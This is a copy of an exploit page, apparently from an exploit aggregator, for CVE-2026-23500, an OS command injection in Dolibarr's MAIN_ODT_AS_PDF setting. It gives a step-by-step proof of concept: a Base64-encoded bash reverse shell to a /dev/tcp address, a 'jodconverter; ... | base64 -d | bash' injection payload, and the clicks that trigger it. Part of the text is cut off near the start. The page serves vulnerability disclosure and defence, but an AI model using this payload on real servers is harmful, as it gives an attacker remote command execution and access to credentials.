Share
## https://sploitus.com/exploit?id=73BBB45B-B4F1-5E44-A031-BFDA6015091D
# CVE-2026-23500: OS Command Injection (RCE) via MAIN_ODT_AS_PDF configuration in Dolibarr

## Overview

| Field | Details |
|---|---|
| **CVE ID** | [CVE-2026-23500](https://nvd.nist.gov/vuln/detail/CVE-2026-23500) |
| **Severity** | CRITICAL |
| **Advisory** | [GHSA-w5j3-8fcr-h87w](https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w) |
| **Discovered by** | [Lukasz Rybak](https://github.com/lukasz-rybak) |

## Affected Products

- **Dolibarr/dolibarr** (versions: `) being escaped by the web application or shell, encode the reverse shell command in Base64:
   ```bash
   # Command: bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'
   echo "bash -c 'bash -i >& /dev/tcp/172.26.0.1/4445 0>&1'" | base64
   # Output: YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK
   ```

3. Navigate to **Home -> Setup -> Other Setup**.

4. Add or modify the constant `MAIN_ODT_AS_PDF` with the following injection payload:
   ```bash
   jodconverter; echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjYuMC4xLzQ0NDUgMD4mMScK | base64 -d | bash
   ```
   *(Explanation: `jodconverter` satisfies the initial check, `;` acts as a command separator, and the pipeline decodes and executes the Base64 payload).*


5. Navigate to **Commerce -> New proposal**, create a draft, select an ODT template (e.g., `generic_proposal_odt`), and click **Generate**.




6. Check the netcat listener. A connection will be established, granting a shell on the server:
 



### Impact
**Remote Code Execution (RCE).**
An attacker who gains access to an administrator account (or a malicious administrator) can execute arbitrary commands on the underlying server with the privileges of the web server user (typically `www-data`). This allows for:
- Reading sensitive configuration files (database credentials).
- Modifying application code.
- Full system compromise depending on server configuration (e.g., docker escape, pivoting).

---

### Credits
Reported by Łukasz Rybak

## References

- https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-w5j3-8fcr-h87w
- https://nvd.nist.gov/vuln/detail/CVE-2026-23500

## Disclaimer

This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.